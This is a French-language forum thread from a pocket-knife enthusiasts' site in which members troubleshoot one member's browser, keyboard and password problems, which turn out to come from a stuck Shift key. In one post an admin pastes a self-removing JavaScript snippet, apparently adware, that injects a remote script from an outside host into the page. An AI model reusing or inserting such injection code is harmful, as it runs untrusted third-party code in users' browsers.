LE FORUM DU COUTEAU SUISSE  Forum Index LE FORUM DU COUTEAU SUISSE
" Pour les passionnés du petit couteau de poche "

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

ALLER EN BAS DE PAGE

LE COUTEAU SUISSE 
Mes amis les Modérateurs et moi même vous souhaitons la BIENVENUE , merci de bien lire LA CHARTE DU FORUM avant de Poster !! Vive le S.A.K ( Swiss Army Knife )
Problème de navigation.

Post new topic   Reply to topic    LE FORUM DU COUTEAU SUISSE Forum Index -> DIVERS : -> QUESTIONS ET REPONSES
Previous topic :: Next topic  
Author Message
Cadnium
MODO
MODO

Votre âge: 65

PostPosted: Sat 20 Oct - 12:15:06 (2012)    Post subject: Problème de navigation. Reply with quote

PublicitéSupprimer les publicités ?
Est ce que quelqu'un a déja eu le même problème que moi ?

J'utilise Win 7 et Mozilla.

depuis quelque jours quand je démarre Mozilla, il m'annonce qu'il ne peut pas faire la mise à jour car une autre copie de Mozilla est en cours d'utilisation.

Ce nest pas le cas, une seule copie tourne, celle que je vien de lancer, même problème pour le logiciel de messagerie Thunderbird, pour les deux logiciel je suis obligé de démarrer en mode sans echec.

Autres symptomes,

Au lieu  d'ouvrir un lien dans la même fenêtre ou dans le même onglet il ouvre systématiquement une autre fenêtre.

l'ascenceur vertical ne fonctionne plus avec la souris

je n'arrive plus à obtenir un point avec le clavier principal dans la barre d'adresse, même en passant de majuscule à minuscule j'ai toujours un point virgule,
par contre le point du clavier numèrique est OK, j'ai les mêmes problème avec Google Chrome.

Et ce matin grosse surprise, mon mot de passe Windows non reconnu, imposible de démarrer Windows, j'ai démarer en mode sans echec, le mot de passe a été reconnu, j'ai effacé le mot de passe et redémarré Windows en mode normal, et ça marche Smile

Pour le moment je fais un scan virus complet, et j'envisage de réinstaller mon système ce we en cas de besoin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.worldknifedb.info

www.facebook.com/worldknifedatabase
Back to top
Visit poster’s website
MACGYVER
ADMIN
ADMIN

Votre âge: 61

PostPosted: Sat 20 Oct - 12:19:21 (2012)    Post subject: Problème de navigation. Reply with quote

Non Cadnium , pas de problème chez moi .......

J'en ai eu la semaine dernière , mais j'ai fait un restauration de mon système et tout est revenu dans l'ordre .

Un SAK, même plusieurs, sinon rien !!
Back to top
Visit poster’s website
Cadnium
MODO
MODO

PostPosted: Sat 20 Oct - 12:29:24 (2012)    Post subject: Problème de navigation. Reply with quote

Je vais essayer une restauration avant de reformater, mais je ne suis pas sur que ça va marcher car j'utilise Windows 7 depuis 2 semaines seulement.
www.worldknifedb.info

Back to top
Visit poster’s website
Margot

PostPosted: Sat 20 Oct - 15:18:34 (2012)    Post subject: Problème de navigation. Reply with quote

Bonjour Cadnium

Il est vrai qu'il y a des problèmes de navigation pour l'instant
Back to top
Visit poster’s website
Buzz
ADMIN
ADMIN

Votre âge: 40

PostPosted: Sat 20 Oct - 15:39:37 (2012)    Post subject: Problème de navigation. Reply with quote

Je n'ai pas eu ce problème non plus.
Back to top
Laurent L.
MODO
MODO

Votre âge: 50

PostPosted: Sat 20 Oct - 16:06:06 (2012)    Post subject: Problème de navigation. Reply with quote

Un cochonnerie pourrait s'être installée sur ton système... Si c'est le cas, une restauration peut ne pas suffire car parfois les saletés s'installent dans la partie de Windows qui sert à restaurer : elles sont donc elles aussi remises en place... Il faut alors se mettre en mode "sans échec" pour restaurer ton système.
Le souci vient-il aussi des logiciels de Mozilla, des "paramètres du compte utilisateur" avec "Seven" ? J'ai parfois eu des soucis lors de mises à jour de logiciels vers des versions les plus récentes (ainsi, j'ai une ancienne version de Thunderbird qui me convient bien mieux que les nouvelles) mais rien qui me fasse penser à ce que tu as. Une mise à jour, donc, peut-être, serait l'origine du souci... As-tu installé des "modules complémentaires" dans Frefox récemment ? Un Pare-feu ou un anti-virus juste avant que ces soucis n'apparaissent ?
.
Back to top
Visit poster’s website
MACGYVER
ADMIN
ADMIN

PostPosted: Sat 20 Oct - 16:15:40 (2012)    Post subject: Problème de navigation. Reply with quote

Pour moi depuis quelques temps j'ai des soucis quand je met des smileys , voici ce qui se met à la fin du message  .....
Question

Je suis obligé d'éditer et de supprimer tous ces codes , ce qui est bizarre c'est que ce n'est pas tout le temps .......

Quand je ne met pas  de smileys , il n'y a pas ce problème ......

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Back to top
Visit poster’s website
Laurent L.
MODO
MODO

Votre âge: 50

PostPosted: Sat 20 Oct - 16:27:20 (2012)    Post subject: Problème de navigation. Reply with quote

Les joies de l'informatique... Rolling Eyes

Il faudrait calculer tout le temps et l'énergie perdus à cause de ces systèmes... Cela ferait certainement peur, même au regard de ce que cela a apporté de positif depuis leur développement "grand-public"...
.
Back to top
Visit poster’s website
Cadnium
MODO
MODO

PostPosted: Sat 20 Oct - 18:44:05 (2012)    Post subject: Problème de navigation. Reply with quote

Je confirma, la restauration n’apporte rien, mais j'ai trouvé ce qui ne marche pas avec le mot de passe, c'est le clavier qui déconne, la touche "shift" n'assure plus le passage minuscule majuscule et comme mon mot de passe comporte les deux, et pour compléter le tout la souris semble être malade aussi.

La situation c'est un peu améliorée avec un nettoyage du registre, je ne vais peut être pas tenter la réinstallation complète.
www.worldknifedb.info

Back to top
Visit poster’s website
MACGYVER
ADMIN
ADMIN

PostPosted: Sat 20 Oct - 19:14:55 (2012)    Post subject: Problème de navigation. Reply with quote

Tiens nous au courant Cadnium .

Back to top
Visit poster’s website
auvergnat63

PostPosted: Sat 20 Oct - 20:03:25 (2012)    Post subject: Problème de navigation. Reply with quote

Moi je dirais simplement qu'en fait, tu as une instance qui se ferme mal, ou qui met du temps à fermer.
Quand cela te fait le coup, essaye d'aller dans la gestion des processus, et de tuer le firefox.Exe
Back to top
MACGYVER
ADMIN
ADMIN

PostPosted: Sat 20 Oct - 20:07:46 (2012)    Post subject: Problème de navigation. Reply with quote

Tu réponds à qui auvergnat63 ???

Question

Back to top
Visit poster’s website
auvergnat63

PostPosted: Sat 20 Oct - 20:09:37 (2012)    Post subject: Problème de navigation. Reply with quote

Cadnium !!!!
Ca arrive j'ai remarqué quand le PC commence à être en manque de mémoire, ou alors que firefox est rempli de plugin
Back to top
MACGYVER
ADMIN
ADMIN

PostPosted: Sat 20 Oct - 20:12:13 (2012)    Post subject: Problème de navigation. Reply with quote

Ok merci .

Back to top
Visit poster’s website
auvergnat63

PostPosted: Sat 20 Oct - 20:12:43 (2012)    Post subject: Problème de navigation. Reply with quote

Smile
Back to top
Cadnium
MODO
MODO

PostPosted: Sun 21 Oct - 11:28:28 (2012)    Post subject: Problème de navigation. Reply with quote

J'ai trouvé la solution, c'est tellement bête que je n'ose même pas en parler ici Crying or Very sad

...  Bon allez j'ose...

C'est une touche du clavier qui été coincée, la shift droite, d’où les problèmes de sélection d'icônes, d’ascenseur de mot de passe et d'ouverture intempestive de fenêtre..

Mes problèmes principaux sont réglés, mais ça n'explique toujours pas pourquoi Mozilla et Thunderbird refusent de se mettre à jour.
www.worldknifedb.info

Back to top
Visit poster’s website
MACGYVER
ADMIN
ADMIN

PostPosted: Sun 21 Oct - 16:39:38 (2012)    Post subject: Problème de navigation. Reply with quote

Mr. Green Mr. Green

Voilà ce que c'est de manger du caramel au dessus de son clavier !!!

Back to top
Visit poster’s website
Margot

PostPosted: Sun 21 Oct - 17:56:17 (2012)    Post subject: Problème de navigation. Reply with quote

Laughing Laughing Laughing
Back to top
Visit poster’s website
Post new topic   Reply to topic    LE FORUM DU COUTEAU SUISSE Forum Index -> DIVERS : -> QUESTIONS ET REPONSES All times are GMT + 1 Hour
Page 1 of 1

Jump to:  
Retour en haut de la page

Index | Xooit.com free forum | Free support forum | Free forums directory | Report a violation | Cookies | Charte | Conditions générales d'utilisation
Template SpaceSilver by Mojy, © 2003 Mojy - Mojytech